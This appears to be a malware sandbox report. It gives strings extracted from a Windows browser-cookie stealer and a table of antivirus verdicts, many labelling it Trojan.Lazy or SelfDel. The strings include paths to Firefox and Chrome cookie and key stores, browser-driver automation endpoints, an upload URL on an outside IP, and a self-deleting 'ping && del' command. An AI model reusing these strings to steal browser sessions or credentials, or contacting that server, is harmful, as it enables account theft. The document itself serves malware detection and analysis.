api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
UTF-16LEUNICODE
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Synchronization Log
subject=
*****FOLDER ---
*****FOLDER END*****
#+3;CScs
/session
http://127.0.0.1:
:Content-Type: application/json
DELETE
/title
/execute/sync
/c ping 127.0.0.1 && del "%s" >> NUL
ComSpec
programfiles
Mozilla Firefox\firefox.exe
programfiles(x86)
Google\Chrome\Application\chrome.exe
https://chromedriver.storage.googleapis.com/LATEST_RELEASE_%d
https://chromedriver.storage.googleapis.com/%.*S/chromedriver_win32.zip
Content-Type: application/octet-stream
Content-Encoding: binary
http://195.123.211.57/g.php
https://github.com/mozilla/geckodriver/releases/download/v0.32.0/geckodriver-v0.32.0-win32.zip
e -p %d
%appdata%\Mozilla\Firefox\Profiles
%s\%s\cookies.sqlite
cookies.sqlite
%s\%s\key4.db
key4.db
%ComSpec%
/c "%s" --port=%d
%localappdata%\Google\Chrome\User Data
%s\%s\Network\Cookies
%s\%s\Network
\Cookies
%s\%s\Network\Cookies-journal
%s\%s\Network\NetworkDataMigrated
%s\%s\Preferences
p%s\Local State
%s\First Run
%08x%s
uv@7@
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
FireEye Generic.mg.9029a43c6034a4f0
CAT-QuickHeal Clean
McAfee Artemis!9029A43C6034
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Win32.Lazy.V9z8
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Lazy.299183
K7GW Clean
K7AntiVirus Clean
Arcabit Trojan.Lazy.D490AF
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 Clean
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky Trojan.Win32.SelfDel.icct
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Lazy.299183
Rising Trojan.SelfDel!8.275 (CLOUD)
Emsisoft Gen:Variant.Lazy.299183 (B)
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Lazy.299183
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win64.NetLoader.fh
Trapmine Clean
CMC Clean
Sophos Clean
SentinelOne Clean
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=86)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Gen:Variant.Lazy.299183
Google Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Gen:Variant.Lazy.299183
TACHYON Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG FileRepMalware [Misc]
Avast FileRepMalware [Misc]
No IRMA results available.